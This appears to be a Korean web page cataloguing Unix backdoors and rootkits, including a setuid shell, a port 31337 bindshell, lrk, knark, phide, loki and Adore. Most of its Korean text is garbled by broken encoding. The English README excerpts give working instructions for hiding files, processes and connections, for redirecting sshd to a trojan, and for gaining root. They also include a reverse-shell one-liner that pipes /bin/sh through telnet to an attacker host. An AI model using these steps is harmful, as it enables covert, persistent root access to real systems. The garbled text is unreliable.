Overview
¶ÇÇÑ, Æ®·ÎÀÌ ¸ñ¸¶(Trojan Horse)´Â Ư±ÇÀ» °¡Áø »ç¿ëÀÚÀÇ ½Ç¼ö ȤÀº °£Á¢ÀûÀÎ ÇùÁ¶¸¦ ÅëÇÏ¿© ¼öµ¿ÀûÀ¸·Î ÀÌ·ç¾îÁø´Ù´Â Á¡¿¡¼ ¹éµµ¾î¿Í´Â ´Ù¸£´Ù. ÃÖ±Ù¿¡ ¹ß°ßµÇ´Â Æ®·ÎÀÌ ¸ñ¸¶ ȤÀº ¹éµµ¾î ÇÁ·Î±×·¥Àº ¹ÙÀÌ·¯½º ȤÀº ¿úÀÇ ÇüÅ·Πµ¿ÀÛÇϱ⵵ Çϸç, ±¸ºÐÀÌ ¸ðÈ£ÇÑ °æ¿ì°¡ ¸¹´Ù.
°Ô´Ù°¡, ½ºÆÄÀÌ¿þ¾î(Spyware)´Â ½¦¾î¿þ¾î¿Í °°Àº ¼ÒÇÁÆ®¿þ¾îÀÇ ¹èÆ÷ÀÚ°¡ »çÀü¿¡ »ç¿ëÀÚÀÇ µ¿ÀǸ¦ ¾ò¾î »ç¿ëÀÚÀÇ ÀÎÅÍ³Ý »ç¿ë½À°ü(ÀÎÅÍ³Ý ¼îÇÎµî ¼ÒºñÇüÅÂ) µî°ú °°Àº Á¤º¸¸¦ »©³»¾î ¸¶ÄÉÆÃÀ» À§ÇÑ ÀÚ·á·Î È°¿ëÇϱ⵵ ÇÑ´Ù. ±×·¯³ª, ºñ¿µ¾î±Ç »ç¿ëÀÚÀÇ °æ¿ì, ÀÌ·¯ÇÑ »çÇ׿¡ ´ëÇØ ¹Ìó ÀνÄÇÏÁö ¸øÇÑ »óÅ¿¡¼ ÀÌ·ç¾îÁö¹Ç·Î ÁÖÀDZí°Ô Àо°í »ç¿ëÇÏ´Â ½À°üÀ» µé¿©¾ß ÇÒ °ÍÀÌ´Ù.
ÇÁ·Î±×·¥À» ÀûÀýÇÑ ÇüÅ·Πº¯ÇüÇϰųª ½±°Ô ã±â ¾î·Á¿î µð·ºÅ丮¿¡
¼û°ÜµÎ´Â ÇüÅÂÀÌ´Ù. À̶§ Ư±ÇÀ» ¾òÀº »óÅ¿¡¼ setuid ºñÆ®¸¦ ¼³Á¤ÇØ ³õÀ½À¸·Î½á
³ªÁß¿¡ attacker´Â ´ÜÁö ÀÌ ÇÁ·Î±×·¥À» ½ÇÇàÇÏ´Â °Í¸¸À¸·Î Ư±ÇÀ» ȹµæÇÒ ¼ö ÀÖ´Ù.
Note: Solaris ½Ã½ºÅÛ°ú ¸î¸î LINUX ½Ã½ºÅÛ¿¡¼´Â µÎ°¡Áö Á¾·ùÀÇ ½©(bash)¸¦
Á¦°øÇÏ¿©, ½ÇÇà½Ã -p (privilege) ¿É¼ÇÀ» °¡Áö°í ½ÇÇàµÇ¾î¾ß effective user id°¡
º¯°æµÇ´Â °æ¿ìµµ ÀÖ´Ù.
ÀÌ ¿¹Á¦´Â C ¾ð¾î·Î ÀÛ¼ºµÈ, ½©À» ¼öÇà½ÃÅ°´Â °£´ÜÇÑ ÇÁ·Î±×·¥ÀÌ´Ù. setuid ºñÆ®°¡
¼³Á¤µÈ »óÅ·Π½ÇÇàµÇ¾î, À¯È¿»ç¿ëÀÚ¾ÆÀ̵ð(effective userid; euid)¸¦ ÀÌ¿ëÇÏ¿©,
½ÇÁ¦»ç¿ëÀÚ¾ÆÀ̵ð(real userid; uid)¸¦ º¯°æ½ÃÅ°´Â ·çƾÀ» Æ÷ÇÔÇÏ°í ÀÖ´Ù.
Note: ½ÇÁ¦»ç¿ëÀÚ¾ÆÀ̵ð´Â À¯È¿»ç¿ëÀÚ¾ÆÀ̵𰡠0(root)ÀÎ »ç¿ëÀÚ¸¸ º¯°æÇÒ ¼ö ÀÖ´Ù.
ÀÌ ÇÁ·Î±×·¥Àº TCP Æ÷Æ®(31337) Æ÷Æ®¿¡ ½©À» bind ½ÃÄѵΰí, ¿ø°Ý¿¡¼
telnet À̳ª nc(netcat) °°Àº ÇÁ·Î±×·¥À¸·Î 31337 Æ÷Æ®¿¡ Á¢¼ÓÇϸé, ·Î±×ÀÎ ÀÎÁõ
ÀýÂ÷¾øÀÌ ¹Ù·Î ·çÆ® ½©À» ȹµæÇÒ ¼ö ÀÖ´Ù. ´Ü, telnetÀ» ÀÌ¿ëÇÏ´Â °æ¿ì, ¸í·É¾î ³¡¿¡¡
¸í·É¾î ºÐ¸®ÀÚ(;)¸¦ Æ÷ÇÔ½ÃÄÑ¾ß ÇÑ´Ù.
Note: This is a backdoor program which can be accessed remotely as telnetd. TDM can not use telnet, rlogin, and ftp command, but this backdoor can use such command. However, you have to specify the correctry return code in the telnet client. If you can not change the return code, the "CR" code will be added and sent, so you type";" at the tail of your command.
ÀÌ ÇÁ·Î±×·¥Àº perl ½ºÅ©¸³Æ® ¾ð¾î·Î ¸¸µé¾îÁø ·çÆ® ½© ¹éµµ¾îÀÌ´Ù. ¼¹öÀÎ audpserver ÇÁ·Î±×·¥ÀÌ UDP Æ÷Æ®(520;route)¿¡ ½©À» ¹ÙÀεù½ÃÄÑ ³õ°í, Ŭ¶óÀ̾ðÆ®ÀÎ audpclient ÇÁ·Î±×·¥À¸·Î Á¢¼ÓÇϵµ·Ï µÇ¾îÀÖ´Ù.
crontab ÆÄÀÏ¿¡ ¹éµµ¾î ÇÁ·Î±×·¥À» µî·Ï½ÃÄѵÒÀ¸·Î½á, ÁöÁ¤ÇÑ ½Ã°£´ë(°ü¸®ÀÚ°¡ ¾ø´Â) ¿¡ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇµµ·Ï ÇÑ ¹éµµ¾îÀÌ´Ù. ÀÌ¿Í °°Àº ¹æ¹ýÀº ÆÄÀÏ ½Ã½ºÅÛÀ̳ª ÇÁ·Î¼¼½º ¸ñ·Ï¿¡ ³ªÅ¸³ªÁö ¾Ê¾Æ °ü¸®ÀÚ°¡ ½±°Ô ¹ß°ßÇϱâ Èûµç Á¡À» ÀÌ¿ëÇÑ °ÍÀÌ´Ù. ÀÌ ÇÁ·Î±×·¥Àº »õº® 2½Ã¿¡ µ¿ÀÛÇÏ¿© TCP port 31337À» ¿¾îµÎ°í, 1½Ã°£ÈÄ ÇÁ·Î¼¼½º¸¦ killÇÏ¿© ÈçÀûÀ» Á¦°ÅÇÏ´Â ¹æ½ÄÀ¸·Î µ¿ÀÛÇÑ´Ù.
This packages includes the following: bindshell port/shell type daemon! chfn Trojaned! User->r00t chsh Trojaned! User->r00t crontab Trojaned! Hidden Crontab Entries du Trojaned! Hide files find Trojaned! Hide files fix File fixer! ifconfig Trojaned! Hide sniffing inetd Trojaned! Remote access killall Trojaned! Wont kill hidden processes linsniffer Packet sniffer! login Trojaned! Remote access ls Trojaned! Hide files netstat Trojaned! Hide connections passwd Trojaned! User->r00t pidof Trojaned! Hide processes ps Trojaned! Hide processes rshd Trojaned! Remote access sniffchk Program to check if sniffer is up and running syslogd Trojaned! Hide logs tcpd Trojaned! Hide connections, avoid denies top Trojaned! Hide processes wted wtmp/utmp editor! z2 Zap2 utmp/wtmp/lastlog eraser!
ÀÌ ÇÁ·Î±×·¥Àº CGI ÀÎÅÍÆäÀ̽º¸¦ ÀÌ¿ëÇÑ ¹éµµ¾îÀÌ´Ù. ¼¹ö°¡ À¥¼¹öÀÇ /cgi-bin µð·ºÅ丮¿¡ ¼³Ä¡µÇ¾î Àֱ⸸ Çϸé, ¸®¸ðÆ®¿¡¼ Ŭ¶óÀ̾ðÆ® ÇÁ·Î±×·¥À» ÀÌ¿ëÇÏ¿© Á¢±ÙÇÒ ¼ö ÀÖ´Ù.
ÀÌ ÇÁ·Î±×·¥Àº lynx¿Í °°Àº ÅؽºÆ® ±â¹ÝÀÇ ºê¶ó¿ìÀú¸¦ ÀÌ¿ëÇÏ¿© Á¢±ÙÇÏ°í, Æнº¿öµå¸¦ ÀÌ¿ëÇÏ¿© ÀڽŸ¸ÀÌ ÀÌ¿ëÇÒ ¼ö ÀÖµµ·Ï ÀÛ¼ºµÇ¾î ÀÖ´Ù.
kbd is a nice little backdoor that allows root access by modifing the SYS_stat and SYS_getuid system calls. Usage after insmod is fairly strait forward: 1. login as a normal user 2. host:~$ touch foobar 3. login again under the *same* username 4. the second login session will be given root privileges host:~# id uid=0(root) gid=0(root) groups=100(users) 5. Remember to repeat this procedure everytime you plan on using the backdoor. To keep this cover, the special uid resets after root is given out, this prevents the legitimate owner of the account from receiving a suspicious root shell when he/she logs in.
This kernel module backdoor hides the process and its child processes. Compiling instructions: ======================= phide_mod.c gcc -c -fomit-frame-pointer -O2 phide_mod.c phide.c gcc -o phide -O2 phide.c Add -DONLY_ROOT_CAN_HIDE when compiling phide_mod.c if you don't want non root users to be able to hide processes. Usage for dummies: ================== If you read the source instead, you can skip this section => apelsin:~/kernel/phide$ gcc -o phide -O2 phide.c apelsin:~/kernel/phide$ gcc -c -fomit-frame-pointer -O2 phide_mod.c apelsin:~/kernel/phide$ su - Password: apelsin:~# insmod ~tm/kernel/phide/phide_mod.o apelsin:~# exit apelsin:~/kernel/phide$ ps a PID TTY STAT TIME COMMAND 156 ttyp0 S 0:00 -bash 729 ttyp0 R 0:00 ps a apelsin:~/kernel/phide$ ./phide +156 apelsin:~/kernel/phide$ ps a PID TTY STAT TIME COMMAND Note! Our ps command wont be shown since it's a child of our shell session which we just hid. apelsin:~/kernel/phide$ ./phide -156 apelsin:~/kernel/phide$ ps a PID TTY STAT TIME COMMAND 156 ttyp0 S 0:00 -bash 771 ttyp0 R 0:00 ps a
hidef Used to hide files on the system. Create your hax0r-directory /usr/lib/.hax0r, and type: ./hidef /usr/lib/.hax0r Now this directory will be hidden, and won't be shown by ls or du. Subdirs and files will be hidden as well, so you don't have to hidef anything you put in this directory. unhidef Used to unhide hidden files. You can cat /proc/knark/files if you've forgotten which files you've hidden. Type: ./unhidef /usr/lib/.hax0r to make your previously hidden directory visible again. However, there is a bug in the module which makes directory trees start from their mount-point. This means, if you have a filesystem mounted to /mnt, and you hide the file /mnt/secret, this file will mounted to /mnt, and you hide the file /mnt/secret, this file will show up as /secret in /proc/knark/files. Files in the root-filesystem aren't affected. ered Used to configure exec-redirection. Copy your sshd trojan to /usr/lib/.hax0r/sshd_trojan, and type: ./ered /usr/local/sbin/sshd /usr/lib/.hax0r/sshd_trojan Now, when /usr/local/sbin/sshd is supposed to be executed, your trojan program will be executed instead. To clear all exec-redirection entries, type: ./ered -c nethide Used to hide strings in /proc/net/tcp and /proc/net/udp. This is where netstat gets it's information. Type: ./nethide ":ABCD " to hide connections to/from port ABCD hex (43981 dec). This will "grep -v" the line ":ABCD " from /proc/net/[tcp|udp]. You have to understand the output from /proc/net/[tcp|udp] to use this program. Lets say that you have sshd running on your box. Connect to localhost port 22, and type: netstat -at One of the lines looks like this: Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 localhost:ssh localhost:1023 ESTABLISHED And now, lets check /proc/net/tcp. Type: cat /proc/net/tcp One of the lines looks like this: local_address rem_address blablabla... 0:0100007F:0016 0100007F:03FF 01 00000000:00000000 00:00000000 00000000 If we want to hide everything about ip-address 127.0.0.1, we have to translate it to this format. Start with 127: 7F in hex. Then 0: 00 in hex, which gives us 007F. And 0 again: 00007F, and at last 1 which gives us the number 0100007F. Now, if we want to hide everything about port 22 and ip-address 127.0.0.1 it looks like this: 0100007F:0016 (0016 is port 22 in hex). So, typing: ./nethide "0100007F:0016" will hide connections to/from localhost port 22, and typing: ./nethide ":ABCD " will remove all lines containing ":ABCD ". It's like "grep -v". Do you get it? :-) rootme Used to gain root-access without using suid programs. Type: ./rootme /bin/sh to execute /bin/sh with root-privs. This will also work: ./rootme /bin/ls -l /root You have to type the whole path-name of the binary to execute. taskhack Used to change *uid's and *gid's of running processes. Type: ./taskhack -alluid=0 pid This will change all *uid's (uid, euid, suid, fsuid) of process "pid" to 0 (root). Type: ps aux | grep bash creed 91 0.0 1.3 1424 824 1 S 15:31 0:00 -bash Now, we want to change the euid of this process to 0 (root). Type: ./taskhack -euid=0 91 ps aux | grep bash root (!) 91 0.0 1.3 1424 824 1 S 15:31 0:00 -bash Isn't this just great? :-).
Ŭ¶óÀ̾ðÆ®(loki)´Â ICMP ȤÀº UDP Çì´õ¿¡ ¸í·ÉÀ» Æ÷ÇÔ½ÃÄÑ Àü´ÞÇÏ°í, ¼¹ö(lokid)´Â °á°ú¸¦ Çì´õ¿¡ Æ÷ÇÔ½ÃÄÑ Àü´ÞÇÔÀ¸·Î½á, ¹æȺ®ÀÌ ¼³Ä¡µÈ ³×Æ®¿öÅ©¿¡¼ ºñ¹ÐÅë½ÅÀ» ÇÒ ¼ö ÀÖµµ·Ï ¸¸µé¾îÁø ¹éµµ¾îÀÌ´Ù.
Usage: 1. Server-Side (= Target System) ~# ./lokid -p i -v 1 2. Client-Side (= Attacker's System) ~# ./loki -d target_ip -p i -v 1 -t 3 loki>
¹æȺ®ÀÌ ¼³Ä¡µÇ¾î ƯÁ¤ Æ÷Æ®¿¡ ´ëÇؼ¸¸ ³×Æ®¿öÅ© Æ®·¡ÇÈÀ» Çã¿ëÇÏ´Â »óȲ¿¡¼ Çã°¡µÈ Æ÷Æ®¸¦ ÀÌ¿ëÇÏ¿© ÅÚ³Ý ¼¼¼ÇÀ» ¿¡¹Ä·¹ÀÌÆ®Çϵµ·Ï ½©À» ƯÁ¤ Æ÷Æ®¿¡ ¹ÙÀεù½ÃÅ°°í, ±× Ãâ·ÂÀ» ¶Ç ´Ù¸¥ Æ÷Æ®¸¦ ÅëÇØ Àü´ÞÇÔÀ¸·Î½á ¼¼¼ÇÀ» È®¸³ÇÏ´Â ¹éµµ¾îÀÌ´Ù.
Usage: 1. Server-Side (= Attacker's System) ~# nc -nvv -l -p 80 and, in the other window ~# nc -nvv -l -p 25 2. Client-Side (= Target System) ~# sleep 10000 | telnet attacker_ip 80 | /bin/sh | telnet attacker_ip 25
Adore is a linux LKM based rootkit. Features smart PROMISC flag hiding, persistant file and directory hiding (still hidden after reboot), process-hiding, netstat hiding, rootshell-backdoor, and an uninstall routine. Includes a userspace program to control everything. Changes: Improved promisc hiding, port hiding fixed, and a readme. Homepage here. By Stealth.
A basic backdoor program, but with a couple of neat features that "secure" the backdoor from being widely misused.
kernel module which allows administrators to log all the commands executed by users
References & Links